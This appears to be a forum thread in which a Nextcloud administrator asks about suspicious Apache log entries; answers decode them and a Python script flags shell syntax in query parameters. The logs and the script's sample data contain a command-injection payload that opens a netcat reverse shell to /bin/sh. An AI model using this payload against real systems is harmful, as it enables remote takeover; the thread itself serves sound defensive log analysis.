
I have a Nextcloud server running on Apache, and disabled my firewall for about 5 minutes while I ran an apt-update. I decided to check the logs after, and found this from an unknown IP. It looks like it is trying to run some sort of script. Does this look like it is malicious or just some web crawler? Thanks!

89.248.166.183 - - [15/Sep/2020:02:06:18 -0400] "GET login.cgi HTTP/1.1" 400 0 "-" "-" 
89.248.166.183 - - [15/Sep/2020:02:06:20 -0400] "GET /set_ftp.cgi?loginuse=&loginpas=&next_url=ftp.htm&port=21&user=ftp&pwd=ftp&dir=/&mode=PORT&upload_interval=0&svr=%24%28nc+89.248.166.183+1245+-e+%2Fbin%2Fs>
89.248.166.183 - - [15/Sep/2020:02:06:20 -0400] "GET /ftptest.cgi?loginuse=&loginpas= HTTP/1.1\n" 400 0 "-" "-"
Gerald Schneider

2 Answers


These kinds of scripted attacks are normal if you have a web server with a public IP. "Good" web crawlers (Google, Bing, etc.) would identify themselves via the User-Agent header and would not try to log in to your site.

claasz

89.248.166.183 - - [15/Sep/2020:02:06:20 -0400] "GET /set_ftp.cgi?loginuse=&loginpas=&next_url=ftp.htm&port=21&user=ftp&pwd=ftp&dir=/&mode=PORT&upload_interval=0&svr=%24%28nc+89.248.166.183+1245+-e+%2Fbin%2Fs>

If you decode the above log, you will get: /set_ftp.cgi?loginuse=&loginpas=&next_url=ftp.htm&port=21&user=ftp&pwd=ftp&dir=/&mode=PORT&upload_interval=0&svr=$(nc 89.248.166.183 1245 -e /bin/s>

The above request is trying to connect to /bin/sh using nc (netcat); in netcat, the -e option is used to specify a filename to execute after connecting.

But the request returned a 400 Bad Request status code.
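The decoding step this answer describes can be automated so that access-log lines whose query parameters carry shell syntax are surfaced for review. The script below is an added example, not code from the question or either answer: it parses Apache combined-format lines, URL-decodes each query value, and flags values containing command-substitution or interpreter tokens. The sample lines are constructed and modelled on the question; 203.0.113.10 and 198.51.100.7 are documentation addresses, not real hosts.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Apache "combined" log line, the format of the lines quoted in the question.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+)(?: [^"]*)?" '
    r'(?P<status>\d{3}) \S+ "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"'
)

# Shell tokens that should never appear in a decoded query value on this kind of
# app: command substitution, command chaining, and interpreter paths. Heuristic;
# tune for your application before alerting on ';' or '||'.
SHELL_RE = re.compile(r'\$\(|`|;|\|\||&&|/bin/(?:ba)?sh\b')

def decode_query(target: str) -> dict:
    """URL-decode the query string of a request target into {name: value}."""
    return dict(parse_qsl(urlsplit(target).query, keep_blank_values=True))

def analyze_line(line: str):
    """Return {'ip', 'status', 'hits'} for a parseable line, None otherwise.
    'hits' maps parameter name -> decoded value that contains shell syntax."""
    m = LOG_RE.match(line)
    if not m:
        return None
    params = decode_query(m.group("target"))
    hits = {k: v for k, v in params.items() if SHELL_RE.search(v)}
    return {"ip": m.group("ip"), "status": int(m.group("status")), "hits": hits}

def scan(lines):
    """Return only the parsed lines whose query carries shell syntax."""
    return [r for r in map(analyze_line, lines) if r and r["hits"]]

# Constructed sample lines modelled on the question (203.0.113.10 and
# 198.51.100.7 are documentation addresses, not real hosts).
SAMPLE_LOG = [
    '203.0.113.10 - - [15/Sep/2020:02:06:18 -0400] "GET login.cgi HTTP/1.1" 400 0 "-" "-"',
    '203.0.113.10 - - [15/Sep/2020:02:06:20 -0400] "GET /set_ftp.cgi?loginuse=&loginpas='
    '&next_url=ftp.htm&port=21&user=ftp&pwd=ftp&dir=/&mode=PORT&upload_interval=0'
    '&svr=%24%28nc+203.0.113.10+1245+-e+%2Fbin%2Fsh%29 HTTP/1.1" 400 0 "-" "-"',
    '198.51.100.7 - - [15/Sep/2020:02:07:01 -0400] "GET /index.php/login?redirect_url=/apps/files'
    ' HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for r in scan(SAMPLE_LOG):
        for name, value in r["hits"].items():
            print(f'{r["ip"]} status={r["status"]} param={name} decoded={value!r}')
```

Only the set_ftp.cgi line is reported; the legitimate Nextcloud login request and the malformed login.cgi request carry no shell syntax, and the status column shows whether the server actually accepted the request.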